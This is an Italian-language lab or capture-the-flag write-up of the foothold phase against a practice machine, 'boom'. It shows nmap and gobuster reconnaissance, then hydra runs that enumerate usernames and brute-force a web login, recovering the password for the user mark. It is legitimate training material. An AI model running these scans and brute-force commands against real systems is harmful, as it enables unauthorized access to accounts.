#+title: VDSI - Boom
#+author: Andrea Pepe
#+date: 31/05/2022

* Foothold
** subnet scanning
Facciamo scanning della sottorete per individuare l'host da attaccare.
#+begin_example
$ sudo nmap -sn -n 192.168.56.0/24    
sudo: impossibile risolvere l'host roronoa: Errore temporaneo nella risoluzione del nome
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 18:38 CEST
Nmap scan report for 192.168.56.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:03 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0015s latency).
MAC Address: 08:00:27:52:FD:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.104
Host is up (0.0011s latency).
MAC Address: 00:0C:29:B2:E4:E7 (VMware)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.82 seconds
#+end_example

L'indirizzo IP della macchina boom è *192.168.56.104* e lo andiamo a
scrivere nel file */etc/hosts* per poterlo riferire per nome.

** nmap
#+begin_example
$ nmap -sC -sV boom    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 18:42 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for boom (192.168.56.104)
Host is up (0.0014s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 40:19:c5:21:62:75:78:6c:88:06:71:bc:f3:c2:31:3d (RSA)
|   256 bf:1b:42:3e:5e:8b:4d:14:86:ed:5c:ac:16:58:23:3d (ECDSA)
|_  256 19:30:8d:e2:6e:27:e0:c3:e1:43:f5:5a:e7:07:c9:b9 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: BOOM! Explosive videoconference
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: BOOM! Explosive videoconference
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=boom.vdsi/organizationName=BOOM/stateOrProvinceName=Italy/countryName=IT
| Not valid before: 2020-07-06T13:05:40
|_Not valid after:  2021-07-06T13:05:40
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds
#+end_example

#+begin_example
$ nmap -p- boom      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 18:42 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for boom (192.168.56.104)
Host is up (0.00050s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 3.74 seconds
#+end_example

Vediamo che c'è *ssh* e un server web sia *HTTP* che *HTTPS* con un server
web *nginx 1.18.0* su *Ubuntu*.

Inoltre, notiamo che nel certificato SSL c'è il common name della
macchina impostato a *boom.vdsi*. Lo aggiungiamo al file /etc/host e ne
facciamo uno scanning di virtual host e directory.

** gobuster
#+begin_example
$ gobuster vhost -u http://boom.vdsi -w ~/Scrivania/gitFolder/SecLists/Discovery/DNS/subdomains-top1million-20000.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://boom.vdsi
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /home/andrea/Scrivania/gitFolder/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/06/01 08:49:15 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.boom.vdsi (Status: 403) [Size: 162]
Found: web.boom.vdsi (Status: 302) [Size: 0]  
Found: api.boom.vdsi (Status: 200) [Size: 96] 
                                              
===============================================================
2022/06/01 08:49:21 Finished
===============================================================
#+end_example

#+begin_example
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://boom.vdsi -x php,html            
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://boom.vdsi
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
2022/06/01 08:51:54 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 26769]
/assets               (Status: 301) [Size: 178] [--> http://boom.vdsi/assets/]
/css                  (Status: 301) [Size: 178] [--> http://boom.vdsi/css/]   
/js                   (Status: 301) [Size: 178] [--> http://boom.vdsi/js/]    
                                                                              
===============================================================
2022/06/01 08:54:22 Finished
===============================================================
#+end_example


** web.boom.vdsi
Espone una pagina php con un form di login ed una per registrarsi;
tuttavia, al momento della registrazione, viene stampato un messaggio
che indica che le registrazioni sono disabilitate.

Nella pagina di login, se si inserisce uno username non valido, viene
stampato il messaggio *No account found with that username*. Se invece,
lo username esiste ma la password è sbagliata, si riceve il messaggio
*The password you entered was not valid.*

Si può quindi fare una enumerazione degli usernames usando ~hydra~.

*** username enumeration
#+begin_example
$ hydra web.boom.vdsi http-form-post "/login.php:username=^USER^&password=pass:No account found with that username." -L ~/Scrivania/gitFolder/SecLists/Usernames/xato-net-10-million-usernames.txt -p pass
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-01 09:31:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking http-post-form://web.boom.vdsi:80/login.php:username=^USER^&password=pass:No account found with that username.
[80][http-post-form] host: web.boom.vdsi   login: admin   password: pass
[80][http-post-form] host: web.boom.vdsi   login: mark   password: pass
[80][http-post-form] host: web.boom.vdsi   login: scott   password: pass
[80][http-post-form] host: web.boom.vdsi   login: brian   password: pass
[80][http-post-form] host: web.boom.vdsi   login: Brian   password: pass
[80][http-post-form] host: web.boom.vdsi   login: Scott   password: pass
[80][http-post-form] host: web.boom.vdsi   login: Mark   password: pass
[80][http-post-form] host: web.boom.vdsi   login: Admin   password: pass
[80][http-post-form] host: web.boom.vdsi   login: SCOTT   password: pass
[STATUS] 4533.00 tries/min, 4533 tries in 00:01h, 8290922 to do in 30:30h, 16 active
[80][http-post-form] host: web.boom.vdsi   login: BRIAN   password: pass
[80][http-post-form] host: web.boom.vdsi   login: MARK   password: pass
[80][http-post-form] host: web.boom.vdsi   login: myles   password: pass
#+end_example

#+begin_src txt
admin
mark
brian
scott
myles
#+end_src

Sembrano dei nomi legati al gruppo musicale *AC/DC* e il fatto che la
macchina si chiami *boom* potrebbe essere legato alla loro hit *TNT*!

*** password enumeration
#+begin_example
$ hydra web.boom.vdsi http-form-post "/login.php:username=^USER^&password=^PASS^:The password you entered was not valid." -L usernames -P /usr/share/wordlists/rockyou.txt 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-01 09:41:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 71721995 login tries (l:5/p:14344399), ~4482625 tries per task
[DATA] attacking http-post-form://web.boom.vdsi:80/login.php:username=^USER^&password=^PASS^:The password you entered was not valid.
[STATUS] 4526.00 tries/min, 4526 tries in 00:01h, 71717469 to do in 264:06h, 16 active
[80][http-post-form] host: web.boom.vdsi   login: admin
[80][http-post-form] host: web.boom.vdsi   login: mark   password: password1
[80][http-post-form] host: web.boom.vdsi   login: scott
[STATUS] 14345764.00 tries/min, 43037292 tries in 00:03h, 28684703 to do in 00:02h, 16 active
[80][http-post-form] host: web.boom.vdsi   login: brian
[STATUS] 14345377.50 tries/min, 57381510 tries in 00:04h, 14340485 to do in 00:01h, 16 active
[80][http-post-form] host: web.boom.vdsi   login: myles
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-01 09:46:03
#+end_example

Si riesce ad entrare nel sito web con le credenziali *mark:password1*,
ma il sito è ancora in costruzione e non sembra esserci nulla di
interessante.

Si provano ad usare le credenziali per un login tramite ssh, ma
l'utente *mark* ha abilitato l'accesso solo tramite meccanismo a chiave
pubblica.

